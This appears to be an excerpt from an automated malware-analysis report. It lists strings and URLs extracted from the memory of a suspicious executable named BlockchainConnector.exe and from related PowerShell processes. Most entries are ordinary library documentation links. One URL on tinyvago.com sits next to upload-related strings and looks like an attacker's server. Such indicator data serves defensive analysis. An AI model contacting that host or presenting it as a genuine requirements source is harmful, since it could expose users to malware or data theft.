Source: BlockchainConnector.exe, 00000007.00000002.1904176562.0000019A0BF30000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: BlockchainConnector.exe, 00000007.00000002.1905324569.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000003.1893700605.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.rfc-editor.org/info/rfc7253
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.rfc-editor.org/rfc/rfc%d.txtz)https://www.python.org/dev/peps/pep-%04d/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.rfc-editor.org/rfc/rfc%d.txtz)https://www.python.org/dev/peps/pep-%04d/rL
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scipy.org/not/real/data.txt
Source: BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D1B0000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
Source: BlockchainConnector.exe, 00000007.00000002.1903874516.0000019A0BC30000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000002.1907249603.0000019A1454C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.tinyvago.com/pip/x/requirements.php
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.tinyvago.com/pip/x/requirements.phparbachunka_part_apartsawbamax_sizearequestsapostaurlaf
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.xmlrpc.com/discuss/msgReader$1208
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.xmlrpc.com/discuss/msgReader$1208z
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.xyz.edu/data
Source: BlockchainConnector.exe, 00000007.00000003.1894022452.0000019A0BED4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000002.1904141147.0000019A0BED9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wwwsearch.sf.net/):
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: http://xml.org/sax/features/namespaces
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: http://xml.org/sax/features/namespacesz.http://xml.org/sax/features/namespace-prefixesz
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: http://xml.org/sax/features/string-interningz&http://xml.org/sax/features/validationz5http://xml.org
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: http://xml.python.org/entities/fragment-builder/internalz
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: http://xmlrpc.usefulinc.com/doc/reserved.html
Source: BlockchainConnector.exe, 00000007.00000003.1895148378.0000019A0C236000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894022452.0000019A0BED4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904334897.0000019A0C237000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904141147.0000019A0BED9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://yahoo.com/
Source: powershell.exe, 0000000B.00000002.2040508613.0000000004C01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://arxiv.org/abs/1704.04503
Source: BlockchainConnector.exe, 00000007.00000002.1906330794.0000019A0D670000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1895215886.0000019A0D66F000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1893898051.0000019A0D65B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://askubuntu.com/questions/697397/python3-is-not-supporting-gtk-module
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://brew.sh
Source: BlockchainConnector.exe, 00000007.00000002.1904607572.0000019A0C430000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://cloud.google.com/appengine/docs/standard/runtimes
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://code.google.com/archive/p/casadebender/wikis/Win32IconImagePlugin.wiki
Source: powershell.exe, 0000000B.00000002.2047990476.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2047990476.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2047990476.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://creativecommons.org/publicdomain/zero/1.0/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://cryptography.io/en/latest/hazmat/
Source: BlockchainConnector.exe, 00000007.00000002.1906683351.0000019A0DBE0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://data-apis.org/array-api/latest/design_topics/data_interchange.html#syntax-for-data-interchan
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc5246#section-7.4.1.4.1
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://docs.python.org/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://docs.python.org/%d.%d/libraryNrM
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://docs.python.org/%d.%d/libraryNrMc
Source: BlockchainConnector.exe, 00000007.00000002.1904607572.0000019A0C430000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/socket.html#socket.socket.connect_ex
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://docs.python.org/X.Y/library/
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/library/string.html#format-specification-mini-language
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.scipy.org/doc/numpy/user/basics.io.genfromtxt.html
Source: BlockchainConnector.exe, 00000007.00000002.1906987998.0000019A13F40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.scipy.org/doc/numpy/user/numpy-for-matlab-users.html).
Source: BlockchainConnector.exe, 00000007.00000002.1906290521.0000019A0D65B000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000003.1893898051.0000019A0D65B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://exiv2.org/tags.html)
Source: BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D1B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gist.github.com/imneme/540829265469e673d045
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/NVIDIA/caffe.
Source: BlockchainConnector.exe, 00000007.00000002.1904933068.0000019A0C830000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: powershell.exe, 00000010.00000002.1988393880.0000000005311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/arogozhnikov/einops
Source: BlockchainConnector.exe, 00000007.00000002.1907079477.0000019A14284000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/asweigart/pyperclip/issues/55
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D78CC1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/cisco/openh264/releases
Source: BlockchainConnector.exe, 00000007.00000002.1904176562.0000019A0BF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/giampaolo/psutil/issues/875.
Source: BlockchainConnector.exe, 00000007.00000003.1893811664.0000019A0C2F1000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904501910.0000019A0C2F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/joblib/threadpoolctl
Source: BlockchainConnector.exe, 00000007.00000002.1906764276.0000019A0DD20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/numpy/numpy/issues/4763
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/opencv/opencv/issues/16739
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/opencv/opencv/issues/16739cv::MatOp_AddEx::assign
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/opencv/opencv/issues/20833
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/opencv/opencv/issues/20833.
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/opencv/opencv/issues/20833DNN/OpenCL:
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/opencv/opencv/issues/21326
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/opencv/opencv/issues/21326cv::initOpenEXRD:
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/opencv/opencv/issues/23152.
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/opencv/opencv/issues/5412.
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/opencv/opencv/issues/6293
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/opencv/opencv/issues/6293u-
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/openvinotoolkit/open_model_zoo/blob/master/models/public/yolo-v2-tiny-tf/yolo-v2-
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://github.com/pyca/cryptography/issues
Source: BlockchainConnector.exe, 00000007.00000002.1905113493.0000019A0C9E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pydata/bottleneck
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://github.com/pypa/packagingz
Source: BlockchainConnector.exe, 00000007.00000002.1905630547.0000019A0D0B0000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://github.com/python-pillow/Pillow/
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/3.7/Objects/listsort.txt
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/torch/nn/blob/master/doc/module.md
Source: BlockchainConnector.exe, 00000007.00000003.1894394899.0000019A0C274000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904480580.0000019A0C2DC000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1895230944.0000019A0C2DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: BlockchainConnector.exe, 00000007.00000002.1904255809.0000019A0C130000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/2680
Source: BlockchainConnector.exe, 00000007.00000002.1904255809.0000019A0C130000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/26800x
Source: BlockchainConnector.exe, 00000007.00000002.1904607572.0000019A0C430000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/497
Source: BlockchainConnector.exe, 00000007.00000003.1894022452.0000019A0BED4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904035119.0000019A0BE30000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904141147.0000019A0BED9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/
Source: BlockchainConnector.exe, 00000007.00000002.1905407661.0000019A0CC30000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904141147.0000019A0BED9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/get
Source: BlockchainConnector.exe, 00000007.00000002.1904081490.0000019A0BE63000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894339402.0000019A0BE61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/post
Source: BlockchainConnector.exe, 00000007.00000002.1905042748.0000019A0C93C000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894056234.0000019A0C938000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1893415079.0000019A0C8AF000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://mahler:8092/site-updates.py
Source: BlockchainConnector.exe, 00000007.00000003.1893654450.0000019A0C3F4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904576783.0000019A0C3F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://metacpan.org/pod/distribution/Math-Cephes/lib/Math/Cephes.pod#i0:-Modified-Bessel-function-o
Source: BlockchainConnector.exe, 00000007.00000002.1907183150.0000019A14380000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mouseinfo.readthedocs.io
Source: powershell.exe, 0000000B.00000002.2040508613.0000000004EA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2047990476.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: BlockchainConnector.exe, 00000007.00000002.1906841210.0000019A13E40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://numpy.org/doc/stable/reference/random/index.html
Source: BlockchainConnector.exe, 00000007.00000003.1893811664.0000019A0C2F1000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904501910.0000019A0C2F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://numpy.org/neps/nep-0013-ufunc-overrides.html
Source: BlockchainConnector.exe, 00000007.00000002.1905324569.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000003.1893700605.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onnx.ai/
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onnx.ai/)
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onnxruntime.ai/docs/execution-providers/CoreML-ExecutionProvider.html#coreml_flag_enable_on_
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onnxruntime.ai/docs/execution-providers/CoreML-ExecutionProvider.html#coreml_flag_only_enabl
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onnxruntime.ai/docs/execution-providers/CoreML-ExecutionProvider.html#coreml_flag_use_cpu_on
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://optimized-einsum.readthedocs.io/en/stable/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://people.eecs.berkeley.edu/~wkahan/ieee754status/IEEE754.PDF
Source: BlockchainConnector.exe, 00000007.00000003.1893654450.0000019A0C3F4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904576783.0000019A0C3F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_379.htm
Source: BlockchainConnector.exe, 00000007.00000003.1893567877.0000019A0D397000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_67.htm
Source: BlockchainConnector.exe, 00000007.00000003.1893898051.0000019A0D650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_69.htm
Source: BlockchainConnector.exe, 00000007.00000003.1893567877.0000019A0D397000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894671378.0000019A0D394000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1905833021.0000019A0D395000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_79.htm
Source: BlockchainConnector.exe, 00000007.00000003.1894671378.0000019A0D394000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1905833021.0000019A0D395000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_83.htm
Source: BlockchainConnector.exe, 00000007.00000003.1893567877.0000019A0D397000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D64F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_86.htm
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pjreddie.com/darknet/
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pjreddie.com/darknet/)
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://pyopenssl.org/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://pyopenssl.org/a__uri__uPython
Source: BlockchainConnector.exe, 00000007.00000002.1907183150.0000019A14380000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://pyperclip.readthedocs.io/en/latest/index.html#not-implemented-error
Source: BlockchainConnector.exe, 00000007.00000002.1905482456.0000019A0CD30000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904081490.0000019A0BE63000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894339402.0000019A0BE61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://requests.readthedocs.io
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D584000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scipy-cookbook.readthedocs.io/items/Ctypes.html
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://software.intel.com/openvino-toolkit)
Source: BlockchainConnector.exe, 00000007.00000002.1907079477.0000019A141E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/questions/18905702/python-ctypes-and-mutable-buffers
Source: BlockchainConnector.exe, 00000007.00000002.1904176562.0000019A0BF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/questions/4457745#4457745.
Source: BlockchainConnector.exe, 00000007.00000002.1907079477.0000019A141E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/questions/455434/how-should-i-use-formatmessage-properly-in-c
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://stat.ethz.ch/~stahel/lognormal/bioscience.pdf
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.aminer.org/pdf/PDF/000/317/196/spatio_temporal_wiener_filtering_of_image_sequences_us
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D78CC1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://streams.videolan.org/upload/
Source: BlockchainConnector.exe, 00000007.00000003.1894022452.0000019A0BED4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904141147.0000019A0BED9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: BlockchainConnector.exe, 00000007.00000003.1894585571.0000019A0C243000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D1B0000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894628577.0000019A0C246000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904396374.0000019A0C247000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: BlockchainConnector.exe, 00000007.00000002.1905324569.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D1F8000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1893700605.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: BlockchainConnector.exe, 00000007.00000003.1894022452.0000019A0BED4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904035119.0000019A0BE30000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904141147.0000019A0BED9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: BlockchainConnector.exe, 00000007.00000002.1904689424.0000019A0C530000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy
Source: BlockchainConnector.exe, 00000007.00000002.1904689424.0000019A0C530000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904607572.0000019A0C430000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
Source: BlockchainConnector.exe, 00000007.00000002.1905407661.0000019A0CC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/contrib.html#socks-proxies
Source: BlockchainConnector.exe, 00000007.00000002.1904852848.0000019A0C730000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/stable/v2-migration-guide.html
Source: BlockchainConnector.exe, 00000007.00000003.1894257723.0000019A09F8E000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1903643435.0000019A09F91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://w3c.github.io/html/sec-forms.html#multipart-form-data
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.archive.org/web/20080221202153/https://www.math.hmc.edu/~benjamin/papers/CombTrig.pdf
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.archive.org/web/20090423014010/http://www.brighton-webs.co.uk:80/distributions/wald.asp
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.archive.org/web/20090514091424/http://brighton-webs.co.uk:80/distributions/rayleigh.asp
Source: BlockchainConnector.exe, 00000007.00000002.1906290521.0000019A0D65B000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000003.1893898051.0000019A0D65B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.archive.org/web/20120328125543/http://www.jpegcameras.com/libjpeg/libjpeg-3.html
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://web.archive.org/web/20170802060935/http://oss.sgi.com/projects/ogl-sample/registry/EXT/textu
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.cazabon.com
